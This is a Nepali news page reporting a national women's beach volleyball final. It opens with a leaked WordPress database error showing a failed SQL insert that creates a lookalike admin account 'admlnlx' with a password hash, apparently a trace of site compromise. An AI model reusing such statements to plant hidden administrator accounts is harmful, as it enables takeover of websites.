WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2qE63zZLvHoWoVw3CWihuZ8p5Rdvg.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:29:32', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ९ असार, काठमाण्डौ । बिनिता बुढाथाेकी र नेविका चाैधरीकाे जाेडी नेपाल एपिएफ ‘ए’ ले छैटाै राष्ट्रिय महिला बिच भलिबल प्रतियाेगिताकाे उपाधि जितेका छन ।
फेवाताल किनारकाे काेर्टमा साेमबार बिहान भएकाे खेलमा बिनिता र नेविकाकाे जाेडीले नेपाल पुलिस ‘ए’का निता कुमारी शाह र काेपिला उप्रेतीकाे जाेडी लाई २-० काे साेझाे सेटमा पराजित गर्दै उपाधि जितेकाे हाे ।
एकपक्षीय खेलमा बिनिता र नेविकाकाे जाेडीले निता र काेपिलाकाे जाेडीमाथि २१-१३ र २१-१३ ले पराजित गर्दै उपाधि हात पार्यो । उपाधिसँगै एपिएफले ३० हजार रुपैया, पुलिसले २० हजार रुपैया र तेस्राे भएकाे गण्डकीले १० हजार पायाे ।
https://gaulenews.com/?p=46562
https://gaulenews.com/?p=46691